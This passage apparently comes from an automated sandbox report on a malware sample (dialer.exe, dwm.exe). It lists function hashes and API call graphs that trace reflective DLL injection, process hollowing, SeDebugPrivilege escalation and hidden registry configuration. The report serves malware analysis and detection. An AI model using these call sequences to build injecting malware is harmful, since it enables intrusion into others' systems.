                                                        • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                        • Instruction Fuzzy Hash: B451D63A7216008BDB96CB25D448F2937B5F394BD8F718125DA8E63748EBB4E841C726
                                                        Function 000002BAAEDC83E8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001E.00000002.3183027949.000002BAAEDC0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002BAAEDC0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_30_2_2baaedc0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: CurrentImageNonwritable__except_validate_context_record
                                                        • String ID: csm$f
                                                        • API String ID: 3242871069-629598281
                                                        • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                        • Instruction ID: 983ef2cb673edadab5a5c8751c99234bdd523c64c97835a6c5c175e4b82085e2
                                                        • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                        • Instruction Fuzzy Hash: AE31BF36211740DAE796DF21E848B2937B5F380BD8F258018EE9F57788DB38E941C726
                                                        Function 000002BAAEE02058 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001E.00000002.3183087492.000002BAAEDF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDF0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_30_2_2baaedf0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: FileWrite$ConsoleErrorLastOutput
                                                        • String ID:
                                                        • API String ID: 2718003287-0
                                                        • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                        • Instruction ID: 0cfbe3989ad51b6503d5e2804fa8513af81f4b4ee7e02c74761ffe8a52e4bf6f
                                                        • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                        • Instruction Fuzzy Hash: E4D1C032B14A80A9E761CFB9D44839C3BB1F3587A8F248216DE9D97F9ADB34C506C351
                                                        Function 000002BAAEDF14A4 Relevance: 6.3, APIs: 5, Instructions: 42memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001E.00000002.3183087492.000002BAAEDF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDF0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_30_2_2baaedf0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$Free
                                                        • String ID:
                                                        • API String ID: 3168794593-0
                                                        • Opcode ID: ccd79a5c24cc2b6b77d5d0d776de3086a7ca9ca8278a44c8c605b81f59301eca
                                                        • Instruction ID: 1e86a15e4ee639612e1e838b532126df22f3cbbb115fb5d08622a82986b655b6
                                                        • Opcode Fuzzy Hash: ccd79a5c24cc2b6b77d5d0d776de3086a7ca9ca8278a44c8c605b81f59301eca
                                                        • Instruction Fuzzy Hash: D2118B36540B92EAE7A4DF62A80824977B0F78CF81F284035EA8D03F16DF38C054C751
                                                        Function 000002BAAEE02980 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001E.00000002.3183087492.000002BAAEDF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDF0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_30_2_2baaedf0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: ConsoleErrorLastMode
                                                        • String ID:
                                                        • API String ID: 953036326-0
                                                        • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                        • Instruction ID: 4807b2611076f96943862d161e056cdd6436f4ff96b8a97d2ae52b867fc3dd30
                                                        • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                        • Instruction Fuzzy Hash: 2891C432740650A5FBF0DF6994883AD3BF4B758B88F744109DE8A67E86DB34C486C722
                                                        Function 000002BAAEDF7960 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001E.00000002.3183087492.000002BAAEDF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDF0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_30_2_2baaedf0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                        • String ID:
                                                        • API String ID: 2933794660-0
                                                        • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                        • Instruction ID: 3f5f6fd16ddd14ed0e1bb1819c72d6881c103777ea279e037482266a28d62027
                                                        • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                        • Instruction Fuzzy Hash: E2115E26B50F019AEF50CF60E8583A833B4F719758F540E35DAAD46BA8DF78C298C391
                                                        Function 000002BAAEDF253C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001E.00000002.3183087492.000002BAAEDF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDF0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_30_2_2baaedf0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3081899298-91387939
                                                        • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                        • Instruction ID: 937e72dd8e6d345f089c8e2313df90b66dad40338bf09b86f9c15cb5c94cb251
                                                        • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                        • Instruction Fuzzy Hash: E671C23660078186EB74DF29D8483AA77B4F389B84FA50026DE8E57F89DF35C645C712
                                                        Function 000002BAAEDC9E1C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001E.00000002.3183027949.000002BAAEDC0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002BAAEDC0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_30_2_2baaedc0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: CallTranslator
                                                        • String ID: MOC$RCC
                                                        • API String ID: 3163161869-2084237596
                                                        • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                        • Instruction ID: 363db27806a8208c57939334ef9cec9730f8f839637735c7e8f31fbceec634d5
                                                        • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                        • Instruction Fuzzy Hash: DC615333A01A848AEB22DF65D48439D77B0F398BC8F248216EF8D17B98DB38D195C711
                                                        Function 000002BAAEDF2330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001E.00000002.3183087492.000002BAAEDF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDF0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_30_2_2baaedf0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3081899298-91387939
                                                        • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                        • Instruction ID: 9a98f76d43b1946ffa988f3be5de7d8b23f197965298065719e08abfb02428c5
                                                        • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                        • Instruction Fuzzy Hash: ED51243220438196EA78CF2DA05C3AABBB1F395780F650125DECE03B89DB3AC504C762
                                                        Function 000002BAAEE026F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001E.00000002.3183087492.000002BAAEDF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDF0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_30_2_2baaedf0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: ErrorFileLastWrite
                                                        • String ID: U
                                                        • API String ID: 442123175-4171548499
                                                        • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                        • Instruction ID: 9f878c62cf4b7bea1f65f453db809c2fc137e0a7b7cd26cf74e1801bed0496c8
                                                        • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                        • Instruction Fuzzy Hash: EC41D532714B8096DB70CF69E8483A977B0F798794F644021EE8D87B98EB7CC545C761
                                                        Function 000002BAAEDF94A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001E.00000002.3183087492.000002BAAEDF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDF0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_30_2_2baaedf0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFileHeaderRaise
                                                        • String ID: csm
                                                        • API String ID: 2573137834-1018135373
                                                        • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                        • Instruction ID: b2c0425ecf9cb7ccc282c22f606d908f3bcba3e897ed7f9796a669c9dbd0fbc2
                                                        • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                        • Instruction Fuzzy Hash: D711F836614B8082EB61CB15E448359B7E5FB88B94F684225EECD07B69DF3CC555CB40
                                                        Function 000002BAAEDC7356 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001E.00000002.3183027949.000002BAAEDC0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002BAAEDC0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_30_2_2baaedc0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: __std_exception_copy
                                                        • String ID: ierarchy Descriptor'$riptor at (
                                                        • API String ID: 592178966-758928094
                                                        • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                        • Instruction ID: 80d0714f7356b10da1b5c47540756507ab6a4aff8d62ac4a436c721598fc27c5
                                                        • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                        • Instruction Fuzzy Hash: 2BE08661641B44D1DF029F21E88429833B0DB98B64B989122D99C46351FB38D1E9C311
                                                        Function 000002BAAEDC73B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001E.00000002.3183027949.000002BAAEDC0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002BAAEDC0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_30_2_2baaedc0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: __std_exception_copy
                                                        • String ID: Locator'$riptor at (
                                                        • API String ID: 592178966-4215709766
                                                        • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                        • Instruction ID: fd39a01d5779ee7db575262003db31ec3d3ee27b08c58c4554370aa0ecd2c365
                                                        • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                        • Instruction Fuzzy Hash: A1E0C261A01B48C5DF029F31E88029873B0EBA8B64F98D123CE8C47351FB38D1E9C311
                                                        Function 000002BAAEDF1BF4 Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001E.00000002.3183087492.000002BAAEDF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDF0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_30_2_2baaedf0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocFree
                                                        • String ID:
                                                        • API String ID: 756756679-0
                                                        • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                        • Instruction ID: 971d5e98438810f3fd65c55ecbdf4f3b11b29921933e4b78099080cbc9bec214
                                                        • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                        • Instruction Fuzzy Hash: 4811AC25601B9581EA54DF6BA80C32AB7B1FB89FD0F288128DE8D43B66DF39C442C311
                                                        Function 000002BAAEDF1268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001E.00000002.3183087492.000002BAAEDF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDF0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_30_2_2baaedf0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: Heap$AllocProcess
                                                        • String ID:
                                                        • API String ID: 1617791916-0
                                                        • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                        • Instruction ID: 4716464f79ddb8eb708ebf8df0892cbc7baf360fe0a5473338bdaf4dc5786430
                                                        • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                        • Instruction Fuzzy Hash: C0E06D3564160686EB548F62D80C34A37F1FB8DF06F14C024C98D07B52DF7D8499C761

                                                        Execution Graph

                                                        Execution Coverage:48.5%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:226
                                                        Total number of Limit Nodes:22
                                                        execution_graph 384 140002b38 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 385 140002b8e K32EnumProcesses 384->385 386 140002beb SleepEx 385->386 387 140002ba3 385->387 386->385 387->386 389 140002540 387->389 390 140002558 389->390 391 14000254d 389->391 390->387 393 1400010c0 391->393 431 1400018ac OpenProcess 393->431 396 1400014ba 396->390 397 140001122 OpenProcess 397->396 398 14000113e OpenProcess 397->398 399 140001161 K32GetModuleFileNameExW 398->399 400 1400011fd NtQueryInformationProcess 398->400 401 1400011aa CloseHandle 399->401 402 14000117a PathFindFileNameW lstrlenW 399->402 403 1400014b1 CloseHandle 400->403 404 140001224 400->404 401->400 406 1400011b8 401->406 402->401 405 140001197 StrCpyW 402->405 403->396 404->403 407 140001230 OpenProcessToken 404->407 405->401 406->400 408 1400011d8 StrCmpIW 406->408 407->403 409 14000124e GetTokenInformation 407->409 408->403 408->406 410 1400012f1 409->410 411 140001276 GetLastError 409->411 412 1400012f8 CloseHandle 410->412 411->410 413 140001281 LocalAlloc 411->413 412->403 418 14000130c 412->418 413->410 414 140001297 GetTokenInformation 413->414 415 1400012df 414->415 416 1400012bf GetSidSubAuthorityCount GetSidSubAuthority 414->416 417 1400012e6 LocalFree 415->417 416->417 417->412 418->403 419 14000139b StrStrA 418->419 420 1400013c3 418->420 419->418 421 1400013c8 419->421 420->403 421->403 422 1400013f3 VirtualAllocEx 421->422 422->403 423 140001420 WriteProcessMemory 422->423 423->403 424 14000143b 423->424 436 14000211c 424->436 426 14000145b 426->403 427 140001478 WaitForSingleObject 426->427 430 140001471 CloseHandle 426->430 429 140001487 GetExitCodeThread 427->429 427->430 429->430 430->403 432 14000110e 431->432 433 1400018d8 IsWow64Process 431->433 432->396 432->397 434 1400018f8 CloseHandle 433->434 435 1400018ea 433->435 434->432 435->434 439 140001914 GetModuleHandleA 436->439 440 140001934 GetProcAddress 439->440 441 14000193d 439->441 440->441 442 140002bf8 443 140002c05 442->443 445 140002c25 ConnectNamedPipe 443->445 446 140002c1a Sleep 443->446 453 140001b54 AllocateAndInitializeSid 443->453 447 140002c83 Sleep 445->447 448 140002c34 ReadFile 445->448 446->443 450 140002c8e DisconnectNamedPipe 447->450 449 140002c57 448->449 448->450 460 140002524 449->460 450->445 454 140001bb1 SetEntriesInAclW 453->454 455 140001c6f 453->455 454->455 456 140001bf5 LocalAlloc 454->456 455->443 456->455 457 140001c09 InitializeSecurityDescriptor 456->457 457->455 458 140001c19 SetSecurityDescriptorDacl 457->458 458->455 459 140001c30 CreateNamedPipeW 458->459 459->455 461 140002531 460->461 462 140002539 WriteFile 460->462 463 1400010c0 30 API calls 461->463 462->450 463->462 464 140002258 467 14000226c 464->467 491 140001f2c 467->491 470 140001f2c 14 API calls 471 14000228f GetCurrentProcessId OpenProcess 470->471 472 140002321 FindResourceExA 471->472 473 1400022af OpenProcessToken 471->473 476 140002341 SizeofResource 472->476 477 140002261 ExitProcess 472->477 474 1400022c3 LookupPrivilegeValueW 473->474 475 140002318 CloseHandle 473->475 474->475 478 1400022da AdjustTokenPrivileges 474->478 475->472 476->477 479 14000235a LoadResource 476->479 478->475 480 140002312 GetLastError 478->480 479->477 481 14000236e LockResource GetCurrentProcessId 479->481 480->475 505 1400017ec GetProcessHeap HeapAlloc 481->505 483 14000238b RegCreateKeyExW 484 140002489 CreateThread GetProcessHeap HeapAlloc CreateThread CreateThread 483->484 485 1400023cc ConvertStringSecurityDescriptorToSecurityDescriptorW 483->485 486 14000250f SleepEx 484->486 487 1400023f4 RegSetKeySecurity LocalFree 485->487 488 14000240e RegCreateKeyExW 485->488 486->486 487->488 489 140002448 GetCurrentProcessId RegSetValueExW RegCloseKey 488->489 490 14000247f RegCloseKey 488->490 489->490 490->484 492 140001f35 StrCpyW StrCatW GetModuleHandleW 491->492 493 1400020ff 491->493 492->493 494 140001f86 GetCurrentProcess K32GetModuleInformation 492->494 493->470 495 1400020f6 FreeLibrary 494->495 496 140001fb6 CreateFileW 494->496 495->493 496->495 497 140001feb CreateFileMappingW 496->497 498 140002014 MapViewOfFile 497->498 499 1400020ed CloseHandle 497->499 500 1400020e4 CloseHandle 498->500 501 140002037 498->501 499->495 500->499 501->500 502 140002050 lstrcmpiA 501->502 504 14000208e 501->504 502->501 503 140002090 VirtualProtect VirtualProtect 502->503 503->500 504->500 511 1400014d8 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc K32EnumProcesses 505->511 507 140001885 GetProcessHeap HeapFree 508 140001830 508->507 509 140001851 OpenProcess 508->509 509->508 510 140001867 TerminateProcess CloseHandle 509->510 510->508 512 140001565 511->512 513 14000162f GetProcessHeap RtlFreeHeap GetProcessHeap RtlFreeHeap 511->513 512->513 514 14000157a OpenProcess 512->514 516 14000161a CloseHandle 512->516 517 1400015c9 ReadProcessMemory 512->517 513->508 514->512 515 140001597 K32EnumProcessModules 514->515 515->512 515->516 516->512 517->512 518 1400021d0 519 1400021dd 518->519 520 140001b54 6 API calls 519->520 521 1400021f2 Sleep 519->521 522 1400021fd ConnectNamedPipe 519->522 520->519 521->519 523 140002241 Sleep 522->523 524 14000220c ReadFile 522->524 525 14000224c DisconnectNamedPipe 523->525 524->525 526 14000222f 524->526 525->522 526->525 527 140002560 528 140002592 527->528 529 14000273a 527->529 530 1400026c6 GetProcessHeap HeapAlloc K32EnumProcesses 528->530 531 140002598 528->531 532 140002748 529->532 533 14000297e ReadFile 529->533 534 140002633 530->534 536 140002704 530->536 537 1400025a5 531->537 538 1400026bd ExitProcess 531->538 539 140002751 532->539 540 140002974 532->540 533->534 535 1400029a8 533->535 535->534 548 1400018ac 3 API calls 535->548 536->534 550 1400010c0 30 API calls 536->550 544 1400025ae 537->544 545 140002660 RegOpenKeyExW 537->545 541 140002919 539->541 542 14000275c 539->542 543 14000175c 22 API calls 540->543 549 140001944 ReadFile 541->549 546 140002761 542->546 547 14000279d 542->547 543->534 544->534 560 1400025cb ReadFile 544->560 551 1400026a1 545->551 552 14000268d RegDeleteValueW 545->552 546->534 609 14000217c 546->609 612 140001944 547->612 553 1400029c7 548->553 555 140002928 549->555 550->536 596 1400019c4 SysAllocString SysAllocString CoInitializeEx 551->596 552->551 553->534 564 1400029db GetProcessHeap HeapAlloc 553->564 565 140002638 553->565 555->534 567 140001944 ReadFile 555->567 559 1400026a6 604 14000175c GetProcessHeap HeapAlloc 559->604 560->534 562 1400025f5 560->562 562->534 574 1400018ac 3 API calls 562->574 570 1400014d8 13 API calls 564->570 576 140002a90 4 API calls 565->576 566 1400027b4 ReadFile 566->534 571 1400027dc 566->571 572 14000293f 567->572 587 140002a14 570->587 571->534 577 1400027e9 GetProcessHeap HeapAlloc ReadFile 571->577 572->534 578 140002947 ShellExecuteW 572->578 580 140002614 574->580 576->534 582 14000290b GetProcessHeap 577->582 583 14000282d 577->583 578->534 580->534 580->565 586 140002624 580->586 581 140002a49 GetProcessHeap 584 140002a52 HeapFree 581->584 582->584 583->582 588 140002881 lstrlenW GetProcessHeap HeapAlloc 583->588 589 14000285e 583->589 584->534 590 1400010c0 30 API calls 586->590 587->581 636 1400016cc 587->636 630 140002a90 CreateFileW 588->630 589->582 616 140001c88 589->616 590->534 597 140001a11 CoInitializeSecurity 596->597 598 140001b2c SysFreeString SysFreeString 596->598 599 140001a59 CoCreateInstance 597->599 600 140001a4d 597->600 598->559 601 140001b26 CoUninitialize 599->601 602 140001a88 VariantInit 599->602 600->599 600->601 601->598 603 140001ade 602->603 603->601 605 1400014d8 13 API calls 604->605 607 14000179a 605->607 606 1400017c8 GetProcessHeap HeapFree 607->606 608 1400016cc 5 API calls 607->608 608->607 610 140001914 2 API calls 609->610 611 140002191 610->611 613 140001968 ReadFile 612->613 614 14000198b 613->614 615 1400019a5 613->615 614->613 614->615 615->534 615->566 617 140001cbb 616->617 618 140001cce CreateProcessW 617->618 620 140001e97 617->620 622 140001e62 OpenProcess 617->622 624 140001dd2 VirtualAlloc 617->624 626 140001d8c WriteProcessMemory 617->626 618->617 619 140001d2b VirtualAllocEx 618->619 619->617 621 140001d60 WriteProcessMemory 619->621 620->582 621->617 622->617 623 140001e78 TerminateProcess 622->623 623->617 624->617 625 140001df1 GetThreadContext 624->625 625->617 627 140001e09 WriteProcessMemory 625->627 626->617 627->617 628 140001e30 SetThreadContext 627->628 628->617 629 140001e4e ResumeThread 628->629 629->617 629->620 631 1400028f7 GetProcessHeap HeapFree 630->631 632 140002ada WriteFile 630->632 631->582 633 140002b1c CloseHandle 632->633 634 140002afe 632->634 633->631 634->633 635 140002b02 WriteFile 634->635 635->633 637 140001745 636->637 638 1400016eb OpenProcess 636->638 637->581 638->637 639 140001703 638->639 640 14000211c 2 API calls 639->640 641 140001723 640->641 642 14000173c CloseHandle 641->642 643 140001731 CloseHandle 641->643 642->637 643->642

                                                        Callgraph

                                                        Executed Functions

                                                        Function 000000014000226C Relevance: 61.4, APIs: 27, Strings: 8, Instructions: 165registrymemorythreadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000027.00000002.3126754489.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000027.00000002.3126364002.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000027.00000002.3127169767.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000027.00000002.3127533864.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_39_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: CreateProcess$Close$CurrentHandleResource$FileSecurityThread$DescriptorFreeHeapModuleOpenProtectTokenValueVirtual$AdjustAllocConvertErrorFindInformationLastLibraryLoadLocalLockLookupMappingPrivilegePrivilegesSizeofSleepStringViewlstrcmpi
                                                        • String ID: D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)$DLL$SOFTWARE\dialerconfig$SeDebugPrivilege$kernel32.dll$ntdll.dll$pid$svc64
                                                        • API String ID: 4177739653-1130149537
                                                        • Opcode ID: d90b24f95a95c841a2e029a5b4d6274d008a65fb61feaf57b7d2a555975f1ca1
                                                        • Instruction ID: c2e61514e361dd61edc66d1a85693de1d2c237bf329a5b31df93bef4cff25afe
                                                        • Opcode Fuzzy Hash: d90b24f95a95c841a2e029a5b4d6274d008a65fb61feaf57b7d2a555975f1ca1
                                                        • Instruction Fuzzy Hash: B781E4B6200B4196EB26CF62F8547D977A9F78CBD8F44512AEB4A43A78DF38C148C740
                                                        Function 00000001400010C0 Relevance: 51.0, APIs: 25, Strings: 4, Instructions: 257memorystringnativeCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 24 1400010c0-140001110 call 1400018ac 27 140001116-14000111c 24->27 28 1400014ba-1400014d6 24->28 27->28 29 140001122-140001138 OpenProcess 27->29 29->28 30 14000113e-14000115b OpenProcess 29->30 31 140001161-140001178 K32GetModuleFileNameExW 30->31 32 1400011fd-14000121e NtQueryInformationProcess 30->32 33 1400011aa-1400011b6 CloseHandle 31->33 34 14000117a-140001195 PathFindFileNameW lstrlenW 31->34 35 1400014b1-1400014b4 CloseHandle 32->35 36 140001224-14000122a 32->36 33->32 38 1400011b8-1400011d3 33->38 34->33 37 140001197-1400011a7 StrCpyW 34->37 35->28 36->35 39 140001230-140001248 OpenProcessToken 36->39 37->33 40 1400011d8-1400011ea StrCmpIW 38->40 39->35 41 14000124e-140001274 GetTokenInformation 39->41 40->35 42 1400011f0-1400011fb 40->42 43 1400012f1 41->43 44 140001276-14000127f GetLastError 41->44 42->32 42->40 45 1400012f8-140001306 CloseHandle 43->45 44->43 46 140001281-140001295 LocalAlloc 44->46 45->35 47 14000130c-140001313 45->47 46->43 48 140001297-1400012bd GetTokenInformation 46->48 47->35 51 140001319-140001324 47->51 49 1400012df 48->49 50 1400012bf-1400012dd GetSidSubAuthorityCount GetSidSubAuthority 48->50 52 1400012e6-1400012ef LocalFree 49->52 50->52 51->35 53 14000132a-140001334 51->53 52->45 53->35 54 14000133a-140001344 53->54 54->35 55 14000134a-14000138a call 140001ec4 * 3 54->55 55->35 62 140001390-1400013b0 call 140001ec4 StrStrA 55->62 65 1400013b2-1400013c1 62->65 66 1400013c8-1400013ed call 140001ec4 * 2 62->66 65->62 67 1400013c3 65->67 66->35 72 1400013f3-14000141a VirtualAllocEx 66->72 67->35 72->35 73 140001420-140001439 WriteProcessMemory 72->73 73->35 74 14000143b-14000145d call 14000211c 73->74 74->35 77 14000145f-140001467 74->77 77->35 78 140001469-14000146f 77->78 79 140001471-140001476 78->79 80 140001478-140001485 WaitForSingleObject 78->80 81 1400014ab CloseHandle 79->81 82 1400014a6 80->82 83 140001487-14000149b GetExitCodeThread 80->83 81->35 82->81 83->82 84 14000149d-1400014a3 83->84 84->82
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000027.00000002.3126754489.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000027.00000002.3126364002.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000027.00000002.3127169767.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000027.00000002.3127533864.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_39_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: Process$CloseHandle$Open$InformationToken$AllocAuthorityFileLocalName$CodeCountErrorExitFindFreeLastMemoryModuleObjectPathQuerySingleThreadVirtualWaitWow64Writelstrlen
                                                        • String ID: @$MSBuild.exe$ReflectiveDllMain$dialer.exe
                                                        • API String ID: 2561231171-3753927220
                                                        • Opcode ID: 0577da8a6dab89cee6e9ad54b472e69925a8a9fa9a84297e512ce95199d2773e
                                                        • Instruction ID: 2175fd9260984ecd3e092ef955109d5d50fbfcc0bf213717558b1eb8b1c9701c
                                                        • Opcode Fuzzy Hash: 0577da8a6dab89cee6e9ad54b472e69925a8a9fa9a84297e512ce95199d2773e
                                                        • Instruction Fuzzy Hash: 40B138B260468186EB26DF27F8947E927A9FB8CBC4F404125AF4A477B4EF38C645C740
